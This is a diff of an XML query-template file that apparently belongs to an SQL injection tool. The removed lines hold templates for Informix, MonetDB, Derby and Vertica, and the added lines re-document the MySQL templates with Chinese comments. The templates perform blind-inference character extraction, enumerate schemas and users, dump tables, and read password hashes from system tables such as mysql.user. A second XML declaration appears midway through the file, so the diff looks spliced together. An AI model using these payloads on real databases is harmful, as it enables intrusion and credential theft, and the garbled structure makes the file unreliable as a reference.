-            <blind query="SELECT DISTINCT(TABLE_SCHEMA) FROM INFORMATION_SCHEMA.COLUMNS WHERE %s ORDER BY 1" query2="SELECT DISTINCT(TABLE_NAME) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='%s' ORDER BY 1" count="SELECT COUNT(DISTINCT(TABLE_SCHEMA)) FROM INFORMATION_SCHEMA.COLUMNS WHERE %s" count2="SELECT COUNT(DISTINCT(TABLE_NAME)) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='%s'" condition="column_name" condition2="TABLE_SCHEMA" condition3="TABLE_NAME"/>
-            <inband query="SELECT TABLE_SCHEMA,TABLE_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE %s" condition="COLUMN_NAME" condition2="TABLE_SCHEMA" condition3="TABLE_NAME"/>
-        </search_column>
-    </dbms>
-
-    <dbms value="Informix">
-        <cast query="RTRIM(TO_CHAR(%s))"/>
-        <length query="CHAR_LENGTH(RTRIM(%s))"/>
-        <isnull query="NVL(%s,' ')"/>
-        <delimiter query="||"/>
-        <limit query="SELECT SKIP %d LIMIT 1"/>
-        <limitregexp query="\s+SKIP\s+([\d]+)\s*LIMIT\s*([\d]+)"/>
-        <limitgroupstart query="1"/>
-        <limitgroupstop query="2"/>
-        <limitstring query=" LIMIT "/>
-        <order query="ORDER BY %s ASC"/>
-        <count query="COUNT(%s)"/>
-        <comment query="--"/>
-        <substring query="SUBSTR((%s),%d,%d)"/>
-        <concatenate query="%s||%s"/>
-        <case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END) FROM SYSMASTER:SYSDUAL"/>
-        <!-- NOTE: HEX() only accepts integer values -->
-        <!-- <hex query="HEX(%s)"/> -->
-        <!-- http://www.dbforums.com/showthread.php?1660588-select-first-and-union&p=6478613#post6478613 -->
-        <inference query="ASCII(SUBSTR((SELECT * FROM (%s)),%d,1))>%d"/>
-        <banner query="SELECT DBINFO('VERSION','FULL') FROM SYSMASTER:SYSDUAL"/>
-        <current_user query="SELECT USER FROM SYSMASTER:SYSDUAL"/>
-        <current_db query="SELECT DBINFO('DBNAME') FROM SYSMASTER:SYSDUAL"/>
-        <hostname query="SELECT DBINFO('DBHOSTNAME') FROM SYSMASTER:SYSDUAL"/>
-        <table_comment/>
-        <column_comment/>
-        <is_dba query="(SELECT USERTYPE FROM SYSUSERS WHERE USERNAME=USER)='D'"/>
+        
+        <!-- 获取数据库服务器的主机名 -->
+        <hostname query="@@HOSTNAME"/>
+        
+        <!-- 获取指定表的注释信息 -->
+        <table_comment query="SELECT table_comment FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s' AND table_name='%s'"/>
+        
+        <!-- 获取指定列的注释信息 -->
+        <column_comment query="SELECT column_comment FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema='%s' AND table_name='%s' AND column_name='%s'"/>
+        
+        <!-- 检查当前用户是否具有 DBA 权限 -->
+        <is_dba query="(SELECT super_priv FROM mysql.user WHERE user='%s' LIMIT 0,1)='Y'"/>
+        
+        <!-- 检查是否存在指定的用户定义函数 (UDF) -->
+        <check_udf query="(SELECT name FROM mysql.func WHERE name='%s' LIMIT 0,1)='%s'"/>
+        
+        <!-- 用户相关的查询模板 -->
         <users>
-            <inband query="SELECT USERNAME FROM SYSUSERS"/>
-            <blind query="SELECT SKIP %d LIMIT 1 USERNAME FROM SYSUSERS ORDER BY USERNAME" count="SELECT COUNT(USERNAME) FROM SYSUSERS"/>
+            <!-- 获取所有用户的权限信息 -->
+            <inband query="SELECT grantee FROM INFORMATION_SCHEMA.USER_PRIVILEGES" query2="SELECT user FROM mysql.user" query3="SELECT username FROM DATA_DICTIONARY.CUMULATIVE_USER_STATS"/>
+            
+            <!-- 盲注查询，获取指定位置的用户信息 -->
+            <blind query="SELECT DISTINCT(grantee) FROM INFORMATION_SCHEMA.USER_PRIVILEGES LIMIT %d,1" query2="SELECT DISTINCT(user) FROM mysql.user LIMIT %d,1" query3="SELECT DISTINCT(username) FROM DATA_DICTIONARY.CUMULATIVE_USER_STATS LIMIT %d,1" count="SELECT COUNT(DISTINCT(grantee)) FROM INFORMATION_SCHEMA.USER_PRIVILEGES" count2="SELECT COUNT(DISTINCT(user)) FROM mysql.user" count3="SELECT COUNT(DISTINCT(username)) FROM DATA_DICTIONARY.CUMULATIVE_USER_STATS"/>
         </users>
+        
+        <!-- 密码相关的查询模板 -->
         <passwords>
-            <inband query="SELECT USERNAME,HASHED_PASSWORD||':'||SALT FROM SYSUSER:SYSINTAUTHUSERS" condition="USERNAME"/>
-            <blind query="SELECT HASHED_PASSWORD||':'||SALT FROM SYSUSER:SYSINTAUTHUSERS WHERE USERNAME='%s'"/>
+            <!-- 获取所有用户的用户名和密码哈希 -->
+            <inband query="SELECT user,authentication_string FROM mysql.user" condition="user"/>
+            
+            <!-- 盲注查询，获取指定用户的密码哈希 -->
+            <blind query="SELECT DISTINCT(authentication_string) FROM mysql.user WHERE user='%s' LIMIT %d,1" count="SELECT COUNT(DISTINCT(authentication_string)) FROM mysql.user WHERE user='%s'"/>
         </passwords>
-        <privileges>
-            <inband query="SELECT USERNAME,USERTYPE FROM SYSUSERS" condition="USERNAME"/>
-            <blind query="SELECT USERTYPE FROM SYSUSERS WHERE USERNAME='%s'"/>
-        </privileges>
-        <roles/>
-        <statements/>
-        <dbs>
-            <inband query="SELECT NAME FROM SYSMASTER:SYSDATABASES"/>
-            <blind query="SELECT SKIP %d LIMIT 1 NAME FROM SYSMASTER:SYSDATABASES ORDER BY NAME" count="SELECT COUNT(NAME) FROM SYSMASTER:SYSDATABASES"/>
-        </dbs>
-        <tables>
-            <inband query="SELECT TABNAME FROM %s:SYSTABLES WHERE TABTYPE='T' AND TABID>99"/>
-            <blind query="SELECT SKIP %d LIMIT 1 TABNAME FROM %s:SYSTABLES WHERE TABTYPE='T' AND TABID>99 ORDER BY TABNAME" count="SELECT COUNT(TABNAME) FROM %s:SYSTABLES WHERE TABTYPE='T' AND TABID>99"/>
-        </tables>
-        <columns>
-            <inband query="SELECT COLNAME,COLTYPE FROM %s:SYSTABLES,%s:SYSCOLUMNS WHERE %s:SYSTABLES.TABID=%s:SYSCOLUMNS.TABID AND %s:SYSTABLES.TABNAME='%s'" condition="COLNAME"/>
-            <blind query="SELECT SKIP %d LIMIT 1 COLNAME FROM %s:SYSTABLES,%s:SYSCOLUMNS WHERE %s:SYSTABLES.TABID=%s:SYSCOLUMNS.TABID AND %s:SYSTABLES.TABNAME='%s' ORDER BY COLNAME" query2="SELECT COLTYPE FROM %s:SYSTABLES,%s:SYSCOLUMNS WHERE %s:SYSTABLES.TABID=%s:SYSCOLUMNS.TABID AND %s:SYSTABLES.TABNAME='%s' AND COLNAME='%s'" count="SELECT COUNT(COLNAME) FROM %s:SYSTABLES,%s:SYSCOLUMNS WHERE %s:SYSTABLES.TABID=%s:SYSCOLUMNS.TABID AND %s:SYSTABLES.TABNAME='%s'"  condition="COLNAME"/>
-        </columns>
-        <dump_table>
-            <inband query="SELECT %s FROM %s:%s"/>
-            <blind query="SELECT MIN(%s) FROM %s WHERE RTRIM(TO_CHAR(%s))>'%s'" query2="SELECT MAX(%s) FROM %s WHERE RTRIM(TO_CHAR(%s)) LIKE '%s'" count="SELECT COUNT(*) FROM %s:%s" count2="SELECT COUNT(DISTINCT %s) FROM %s"/>
-        </dump_table>
-        <search_db/>
-        <search_table/>
-        <search_column/>
-    </dbms>
-
-    <dbms value="MonetDB">
-        <cast query="CAST(%s AS VARCHAR(4000))"/>
-        <length query="LENGTH(%s)"/>
-        <isnull query="COALESCE(%s,' ')"/>
-        <delimiter query="||"/>
-        <limit query="LIMIT %d OFFSET %d"/>
-        <limitregexp query="\s+LIMIT\s+([\d]+)\s*OFFSET\s*([\d]+)" query2="\s+LIMIT\s+([\d]+)"/>
-        <limitgroupstart query="2"/>
-        <limitgroupstop query="1"/>
-        <limitstring query=" LIMIT "/>
-        <order query="ORDER BY %s ASC"/>
-        <count query="COUNT(%s)"/>
-        <comment query="--" query2="#"/>
-        <substring query="SUBSTRING((%s),%d,%d)"/>
-        <concatenate query="%s||%s"/>
-        <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
-        <inference query="ASCII(SUBSTRING((%s),%d,1))>%d"/>
-        <banner query="SELECT value FROM environment WHERE name='monet_version'"/>
-        <current_user query="CURRENT_USER"/>
-        <current_db query="SELECT CURRENT_SCHEMA" query2="SELECT value FROM environment WHERE name='gdk_dbname'"/>
-        <hostname/>
-        <table_comment/>
-        <column_comment/>
-        <is_dba query="(SELECT grantor FROM auths WHERE name=CURRENT_USER)=0"/>
-        <check_udf/>
-        <users>
-            <inband query="SELECT name FROM sys.users"/>
-            <!-- NOTE: LIMIT %d OFFSET %d not supported inside subqueries -->
-            <blind query="SELECT name FROM (SELECT name,row_number() over() AS y FROM sys.users)x WHERE x.y-1=%d" count="SELECT COUNT(name) FROM sys.users"/>
-        </users>
-        <passwords/>
-        <privileges/>
-        <roles/>
-        <statements/>
-        <dbs>
-            <inband query="SELECT name FROM schemas"/>
-            <blind query="SELECT name FROM (SELECT name,row_number() over() AS y FROM sys.schemas)x WHERE x.y-1=%d" count="SELECT COUNT(DISTINCT(name)) FROM schemas"/>
-        </dbs>
-        <tables>
-            <inband query="SELECT schemas.name,tables.name FROM tables JOIN schemas ON schema_id=schemas.id WHERE tables.system=false"/>
-            <blind query="SELECT name FROM (SELECT tables.name,row_number() over() AS y FROM tables JOIN schemas ON schema_id=schemas.id WHERE tables.system=false AND schemas.name='%s')x WHERE x.y-1=%d" count="SELECT COUNT(DISTINCT(tables.name)) FROM tables JOIN schemas ON schema_id=schemas.id WHERE tables.system=false AND schemas.name='%s'"/>
-        </tables>
-        <columns>
-            <inband query="SELECT name,type FROM columns WHERE table_id=(SELECT tables.id FROM tables JOIN schemas ON schema_id=schemas.id WHERE tables.name='%s' AND schemas.name='%s' AND tables.id=table_id)" condition="name"/>
-            <blind query="SELECT name FROM (SELECT name,row_number() over() AS y FROM columns WHERE table_id=(SELECT tables.id FROM tables JOIN schemas ON schema_id=schemas.id WHERE tables.name='%s' AND schemas.name='%s'))x WHERE x.y-1=%d" query2="SELECT type FROM columns WHERE name='%s' AND table_id=(SELECT tables.id FROM tables JOIN schemas ON schema_id=schemas.id WHERE tables.name='%s' AND schemas.name='%s')" count="SELECT COUNT(name) FROM columns WHERE table_id=(SELECT tables.id FROM tables JOIN schemas ON schema_id=schemas.id WHERE tables.name='%s' AND schemas.name='%s')" condition="name"/>
-        </columns>
-        <dump_table>
-            <inband query="SELECT %s FROM %s.%s"/>
-            <blind query="SELECT z FROM (SELECT %s AS z,row_number() over() AS y FROM %s.%s)x WHERE x.y-1=%d" count="SELECT COUNT(*) FROM %s.%s"/>
-        </dump_table>
-        <search_db>
-            <inband query="SELECT schemas.name FROM schemas WHERE %s" condition="schemas.name"/>
-            <blind query="SELECT DISTINCT(schemas.name) FROM schemas WHERE %s" count="SELECT COUNT(DISTINCT(schemas.name)) FROM schemas WHERE %s" condition="schemas.name"/>
-        </search_db>
-        <search_table>
-            <inband query="SELECT schemas.name,tables.name FROM tables JOIN schemas ON schema_id=schemas.id WHERE tables.system=false AND %s" condition="tables.name" condition2="schemas.name"/>
-            <blind query="SELECT DISTINCT(schemas.name) FROM tables JOIN schemas ON schema_id=schemas.id WHERE tables.system=false AND %s" query2="SELECT DISTINCT(tables.name) FROM tables JOIN schemas ON schema_id=schemas.id WHERE tables.system=false AND schemas.name='%s'" count="SELECT COUNT(DISTINCT(tables.name)) FROM tables JOIN schemas ON schema_id=schemas.id WHERE tables.system=false AND schemas.name='%s'" count2="SELECT COUNT(DISTINCT(tables.name)) FROM tables JOIN schemas ON schema_id=schemas.id WHERE tables.system=false AND schemas.name='%s'" condition="tables.name" condition2="schemas.name"/>
-        </search_table>
-        <search_column>
-            <inband query="SELECT schemas.name,tables.name FROM tables JOIN schemas ON tables.schema_id=schemas.id JOIN columns ON tables.id=columns.table_id WHERE %s" condition="columns.name" condition2="schemas.name" condition3="tables.name"/>
-            <blind query="SELECT DISTINCT(schemas.name) FROM tables JOIN schemas ON tables.schema_id=schemas.id JOIN columns ON tables.id=columns.table_id WHERE %s" query2="SELECT DISTINCT(tables.name) FROM tables JOIN schemas ON tables.schema_id=schemas.id JOIN columns ON tables.id=columns.table_id WHERE schemas.name='%s'" count="SELECT COUNT(DISTINCT(schemas.name)) FROM tables JOIN schemas ON tables.schema_id=schemas.id JOIN columns ON tables.id=columns.table_id WHERE %s" count2="SELECT COUNT(DISTINCT(tables.name)) FROM tables JOIN schemas ON tables.schema_id=schemas.id JOIN columns ON tables.id=columns.table_id WHERE schemas.name='%s'" condition="columns.name" condition2="schemas.name" condition3="tables.name"/>
-        </search_column>
-    </dbms>
-
-    <dbms value="Apache Derby">
-        <!-- NOTE: CHAR(%s) causes 'A truncation error was encountered trying to shrink CHAR' -->
-        <cast query="RTRIM(CAST(%s AS CHAR(254)))"/>
-        <length query="LENGTH(RTRIM(CAST(%s AS CHAR(254))))"/>
-        <isnull query="COALESCE(%s,' ')"/>
-        <delimiter query="||"/>
-        <limit query="OFFSET %d ROWS FETCH FIRST %d ROWS ONLY"/>
-        <limitregexp query="OFFSET\s+([\d]+)\s+ROWS\s+FETCH\s+FIRST\s+([\d]+)\s+ROWS\s+ONLY"/>
-        <limitgroupstart query="1"/>
-        <limitgroupstop query="2"/>
-        <limitstring/>
-        <order query="ORDER BY %s ASC"/>
-        <count query="COUNT(%s)"/>
-        <!-- NOTE: comment without alphanumeric char in continuation is invalid -->
-        <comment query="--x"/>
-        <substring query="SUBSTR((%s),%d,%d)"/>
-        <concatenate query="%s||%s"/>
-        <!-- NOTE: Apache Derby does not support implicit conversion from int to string -->
-        <case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END) FROM SYSIBM.SYSDUMMY1"/>
-        <inference query="SUBSTR((%s),%d,1)>'%c'"/>
-        <banner/>
-        <current_user query="SELECT USER FROM SYSIBM.SYSDUMMY1"/>
-        <current_db query="SELECT CURRENT SCHEMA FROM SYSIBM.SYSDUMMY1"/>
-        <hostname/>
-        <table_comment/>
-        <column_comment/>
-        <!-- NOTE: ERROR 4251D: Only the database owner can perform this operation. -->
-        <is_dba query="(SELECT COUNT(*) FROM SYS.SYSUSERS)>=0"/>
-        <dbs>
-            <inband query="SELECT SCHEMANAME FROM SYS.SYSSCHEMAS"/>
-            <blind query="SELECT SCHEMANAME FROM SYS.SYSSCHEMAS OFFSET %d ROWS FETCH FIRST 1 ROW ONLY" count="SELECT COUNT(SCHEMANAME) FROM SYS.SYSSCHEMAS"/>
-        </dbs>
-        <tables>
-            <inband query="SELECT SCHEMANAME,TABLENAME FROM SYS.SYSTABLES JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID" condition="SCHEMANAME"/>
-            <blind query="SELECT TABLENAME FROM SYS.SYSTABLES JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE SCHEMANAME='%s' OFFSET %d ROWS FETCH FIRST 1 ROW ONLY" count="SELECT COUNT(TABLENAME) FROM SYS.SYSTABLES JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE SCHEMANAME='%s'"/>
-        </tables>
-        <columns>
-            <!-- NOTE: COLUMNDATATYPE without CAST() causes problems during enumeration -->
-            <inband query="SELECT COLUMNNAME,RTRIM(CAST(COLUMNDATATYPE AS CHAR(254))) FROM SYS.SYSCOLUMNS JOIN SYS.SYSTABLES ON SYS.SYSCOLUMNS.REFERENCEID=SYS.SYSTABLES.TABLEID JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE TABLENAME='%s' AND SCHEMANAME='%s'" condition="COLUMNNAME"/>
-            <blind query="SELECT COLUMNNAME FROM SYS.SYSCOLUMNS JOIN SYS.SYSTABLES ON SYS.SYSCOLUMNS.REFERENCEID=SYS.SYSTABLES.TABLEID JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE TABLENAME='%s' AND SCHEMANAME='%s'" query2="SELECT COLUMNDATATYPE FROM SYS.SYSCOLUMNS JOIN SYS.SYSTABLES ON SYS.SYSCOLUMNS.REFERENCEID=SYS.SYSTABLES.TABLEID JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE TABLENAME='%s' AND COLUMNNAME='%s' AND SCHEMANAME='%s'" count="SELECT COUNT(COLUMNNAME) FROM SYS.SYSCOLUMNS JOIN SYS.SYSTABLES ON SYS.SYSCOLUMNS.REFERENCEID=SYS.SYSTABLES.TABLEID JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE TABLENAME='%s' AND SCHEMANAME='%s'" condition="COLUMNNAME"/>
-        </columns>
-        <dump_table>
-            <inband query="SELECT %s FROM %s"/>
-            <blind query="SELECT %s FROM %s OFFSET %d ROWS FETCH FIRST 1 ROW ONLY" count="SELECT COUNT(*) FROM %s"/>
-        </dump_table>
-        <users>
-            <inband query="SELECT USERNAME FROM SYS.SYSUSERS"/>
-            <blind query="SELECT USERNAME FROM SYS.SYSUSERS OFFSET %d ROWS FETCH FIRST 1 ROW ONLY" count="SELECT COUNT(USERNAME) FROM SYS.SYSUSERS"/>
-        </users>
-        <!-- NOTE: No one can view the 'SYSUSERS'.'PASSWORD' column -->
-        <passwords/>
-        <privileges/>
-        <roles/>
-        <statements/>
-        <search_db>
-            <inband query="SELECT SCHEMANAME FROM SYS.SYSSCHEMAS WHERE %s" condition="SCHEMANAME"/>
-            <blind query="SELECT DISTINCT(SCHEMANAME) FROM SYS.SYSSCHEMAS WHERE %s" count="SELECT COUNT(DISTINCT(SCHEMANAME)) FROM SYS.SYSSCHEMAS WHERE %s" condition="SCHEMANAME"/>
-        </search_db>
-        <search_table>
-            <inband query="SELECT SCHEMANAME,TABLENAME FROM SYS.SYSTABLES JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE %s" condition="TABLENAME" condition2="SCHEMANAME"/>
-            <blind query="SELECT DISTINCT(SCHEMANAME) FROM SYS.SYSTABLES JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE %s" query2="SELECT DISTINCT(TABLENAME) FROM SYS.SYSTABLES JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE SCHEMANAME='%s'" count="SELECT COUNT(DISTINCT(SCHEMANAME)) FROM SYS.SYSTABLES JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE %s" count2="SELECT COUNT(DISTINCT(TABLENAME)) FROM SYS.SYSTABLES JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE SCHEMANAME='%s'" condition="TABLENAME" condition2="SCHEMANAME"/>
-        </search_table>
-        <search_column>
-            <inband query="SELECT SCHEMANAME,TABLENAME FROM SYS.SYSCOLUMNS JOIN SYS.SYSTABLES ON SYS.SYSCOLUMNS.REFERENCEID=SYS.SYSTABLES.TABLEID JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE %s" condition="COLUMNNAME" condition2="SCHEMANAME" condition3="TABLENAME"/>
-            <blind query="SELECT DISTINCT(SCHEMANAME) FROM SYS.SYSCOLUMNS JOIN SYS.SYSTABLES ON SYS.SYSCOLUMNS.REFERENCEID=SYS.SYSTABLES.TABLEID JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE %s" count="SELECT COUNT(DISTINCT(SCHEMANAME)) FROM SYS.SYSCOLUMNS JOIN SYS.SYSTABLES ON SYS.SYSCOLUMNS.REFERENCEID=SYS.SYSTABLES.TABLEID JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE %s" query2="SELECT DISTINCT(TABLENAME) FROM SYS.SYSCOLUMNS JOIN SYS.SYSTABLES ON SYS.SYSCOLUMNS.REFERENCEID=SYS.SYSTABLES.TABLEID JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE %s" count2="SELECT COUNT(DISTINCT(TABLENAME)) FROM SYS.SYSCOLUMNS JOIN SYS.SYSTABLES ON SYS.SYSCOLUMNS.REFERENCEID=SYS.SYSTABLES.TABLEID JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE SCHEMANAME='%s'" condition="COLUMNNAME" condition2="SCHEMANAME" condition3="TABLENAME"/>
-        </search_column>
-   </dbms>
+        
+        <!-- 权限相关的查询模板 -->
+        <privileges>
+            <!-- 获取所有用户的权限信息 -->
+            <inband query="SELECT grantee,privilege_type FROM INFORMATION_SCHEMA.USER_PRIVILEGES" condition="grantee" query2="SELECT user,select_priv,insert_priv,update_priv,delete_priv,create_priv,drop_priv,reload_priv,shutdown_priv,process_priv,file_priv,grant_priv,references_priv,index_priv,alter_priv,show_db_priv,super_priv,create_tmp_table_priv,lock_tables_priv,execute_priv,repl_slave_priv,repl_client_priv,create_view_priv,show_view_priv,create_routine_priv,alter_routine_priv,create_user_priv FROM mysql.user" condition2="user"/>
+            
+            <!-- 盲注查询，获取指定用户的权限信息 -->
+            <blind query="SELECT DISTINCT(privilege_type) FROM INFORMATION_SCHEMA.USER_PRIVILEGES WHERE grantee %s '%s' LIMIT %d,1" query2="SELECT select_priv,insert_priv,update_priv,delete_priv,create_priv,drop_priv,reload_priv,shutdown_priv,process_priv,file_priv,grant_priv,references_priv,index_priv,alter_priv,show_db_priv,super_priv,create_tmp_table_priv,lock_tables_priv,execute_priv,repl_slave_priv,repl_client_priv,create_view_priv,show_view_priv,create_routine_priv,alter_routine_priv,create_user_priv FROM mysql.user WHERE user='%s' LIMIT %d,1" count="SELECT COUNT(DISTINCT(privilege_type)) FROM INFORMATION_SCHEMA.USER_PRIVILEGES WHERE grantee %s '%s'" count2="SELECT COUNT(*) FROM mysql.user WHERE user='%s'"/>
+        </privileges>
 
-    <dbms value="Vertica">
-        <cast query="CAST(%s AS CHARACTER(10000))"/>
-        <length query="LENGTH(%s)"/>
-        <isnull query="COALESCE(%s,' ')"/>
-        <delimiter query="||"/>
-        <limit query="OFFSET %d LIMIT %d"/>
-        <limitregexp query="\s+OFFSET\s+([\d]+)\s+LIMIT\s+([\d]+)" query2="\s+LIMIT\s+([\d]+)"/>
+<?xml version="1.0" encoding="UTF-8"?>
+<!-- XML 文件声明，指定版本为 1.0，编码为 UTF-8 -->
+
+<root>
+    <!-- 根元素，包含所有数据库相关的查询模板 -->
+
+    <dbms value="MySQL">
+        <!-- 定义 MySQL 数据库管理系统相关的查询模板 -->
+
+        <!-- 将字段转换为 NCHAR 类型 -->
+        <cast query="CAST(%s AS NCHAR)"/>
+        
+        <!-- 获取字段的字符长度 -->
+        <length query="CHAR_LENGTH(%s)"/>
+        
+        <!-- 判断字段是否为 NULL，如果是则返回空格 -->
+        <isnull query="IFNULL(%s,' ')"/>
+        
+        <!-- 定义字段分隔符为逗号 -->
+        <delimiter query=","/>
+        
+        <!-- 定义 LIMIT 子句，用于分页查询 -->
+        <limit query="LIMIT %d,%d"/>
+        
+        <!-- 正则表达式匹配 LIMIT 子句，支持两种格式：LIMIT d,d 和 LIMIT d -->
+        <limitregexp query="\s+LIMIT\s+([\d]+)\s*\,\s*([\d]+)" query2="\s+LIMIT\s+([\d]+)"/>
+        
+        <!-- 定义 LIMIT 子句中起始位置的分组索引 -->
         <limitgroupstart query="1"/>
+        
+        <!-- 定义 LIMIT 子句中结束位置的分组索引 -->
         <limitgroupstop query="2"/>
-        <limitstring query=" OFFSET "/>
+        
+        <!-- 定义 LIMIT 子句的字符串表示 -->
+        <limitstring query=" LIMIT "/>
+        
+        <!-- 定义 ORDER BY 子句，按指定字段升序排序 -->
         <order query="ORDER BY %s ASC"/>
+        
+        <!-- 计算字段的行数 -->
         <count query="COUNT(%s)"/>
-        <comment query="--"/>
-        <substring query="SUBSTRING((%s) FROM %d FOR %d)"/>
-        <concatenate query="%s||%s"/>
-        <case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
-        <!-- NOTE: requires >=9.1.1 because of 'cannot cast type varchar to varbinary' -->
-        <hex query="TO_HEX((%s)::varbinary)"/>
-        <inference query="ASCII(SUBSTRING((%s)::varchar FROM %d FOR 1))>%d"/>
+        
+        <!-- 定义 SQL 注释的三种形式：-- -、/* 和 # -->
+        <comment query="-- -" query2="/*" query3="#"/>
+        
+        <!-- 获取字段的子字符串 -->
+        <substring query="MID((%s),%d,%d)"/>
+        
+        <!-- 连接两个字符串 -->
+        <concatenate query="CONCAT(%s,%s)"/>
+        
+        <!-- 使用 CASE 语句进行条件判断 -->
+        <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
+        
+        <!-- 将字段转换为十六进制表示 -->
+        <hex query="HEX(%s)"/>
+        
+        <!-- 推断字段中某个字符的 ASCII 码是否大于指定值 -->
+        <inference query="ORD(MID((%s),%d,1))>%d"/>
+        
+        <!-- 获取数据库版本信息 -->
         <banner query="VERSION()"/>
-        <current_user query="CURRENT_USER"/>
-        <current_db query="CURRENT_SCHEMA()"/>
-        <hostname query="SELECT MIN(node_name) FROM v_catalog.nodes"/>
-        <table_comment query="SELECT comment FROM v_catalog.comments WHERE object_type='TABLE' AND object_schema='%s' AND object_name='%s'"/>
-        <!-- NOTE: Vertica uses "projection columns" in case of column comments (e.g. testusers_super.surname) -->
-        <column_comment query="SELECT comment FROM v_catalog.comments WHERE object_type='COLUMN' AND object_schema='%s' AND object_name LIKE '%.%s'"/>
-        <is_dba query="(SELECT is_super_user FROM v_catalog.users WHERE user_name=CURRENT_USER OFFSET 0 LIMIT 1)"/>
-        <check_udf query="(SELECT procedure_name='%s' FROM v_catalog.user_procedures WHERE procedure_name='%s' OFFSET 0 LIMIT 1)"/>
+        
+        <!-- 获取当前用户 -->
+        <current_user query="CURRENT_USER()"/>
+        
+        <!-- 获取当前数据库名称 -->
+        <current_db query="DATABASE()"/>
+        
+        <!-- 获取数据库服务器的主机名 -->
+        <hostname query="@@HOSTNAME"/>
+        
+        <!-- 获取指定表的注释信息 -->
+        <table_comment query="SELECT table_comment FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s' AND table_name='%s'"/>
+        
+        <!-- 获取指定列的注释信息 -->
+        <column_comment query="SELECT column_comment FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema='%s' AND table_name='%s' AND column_name='%s'"/>
+        
+        <!-- 检查当前用户是否具有 DBA 权限 -->
+        <is_dba query="(SELECT super_priv FROM mysql.user WHERE user='%s' LIMIT 0,1)='Y'"/>
+        
+        <!-- 检查是否存在指定的用户定义函数 (UDF) -->
+        <check_udf query="(SELECT name FROM mysql.func WHERE name='%s' LIMIT 0,1)='%s'"/>
+        
+        <!-- 用户相关的查询模板 -->
         <users>
-            <inband query="SELECT user_name FROM v_catalog.users"/>
-            <blind query="SELECT user_name FROM v_catalog.users OFFSET %d LIMIT 1" count="SELECT COUNT(user_name) FROM v_catalog.users"/>
+            <!-- 获取所有用户的权限信息 -->
+            <inband query="SELECT grantee FROM INFORMATION_SCHEMA.USER_PRIVILEGES" query2="SELECT user FROM mysql.user" query3="SELECT username FROM DATA_DICTIONARY.CUMULATIVE_USER_STATS"/>
+            
+            <!-- 盲注查询，获取指定位置的用户信息 -->
+            <blind query="SELECT DISTINCT(grantee) FROM INFORMATION_SCHEMA.USER_PRIVILEGES LIMIT %d,1" query2="SELECT DISTINCT(user) FROM mysql.user LIMIT %d,1" query3="SELECT DISTINCT(username) FROM DATA_DICTIONARY.CUMULATIVE_USER_STATS LIMIT %d,1" count="SELECT COUNT(DISTINCT(grantee)) FROM INFORMATION_SCHEMA.USER_PRIVILEGES" count2="SELECT COUNT(DISTINCT(user)) FROM mysql.user" count3="SELECT COUNT(DISTINCT(username)) FROM DATA_DICTIONARY.CUMULATIVE_USER_STATS"/>
         </users>
+        
+        <!-- 密码相关的查询模板 -->
         <passwords>
-            <inband query="SELECT user_name,password FROM v_catalog.passwords" condition="user_name"/>
-            <blind query="SELECT password FROM v_catalog.passwords WHERE user_name='%s' OFFSET %d LIMIT 1" count="SELECT COUNT(password) FROM v_catalog.passwords WHERE user_name='%s'"/>
+            <!-- 获取所有用户的用户名和密码哈希 -->
+            <inband query="SELECT user,authentication_string FROM mysql.user" condition="user"/>
+            
+            <!-- 盲注查询，获取指定用户的密码哈希 -->
+            <blind query="SELECT DISTINCT(authentication_string) FROM mysql.user WHERE user='%s' LIMIT %d,1" count="SELECT COUNT(DISTINCT(authentication_string)) FROM mysql.user WHERE user='%s'"/>
         </passwords>
+        
+        <!-- 权限相关的查询模板 -->
         <privileges>
-            <inband query="SELECT grantee,privileges_description FROM v_catalog.grants WHERE object_type!='PROCEDURE'" condition="grantee"/>
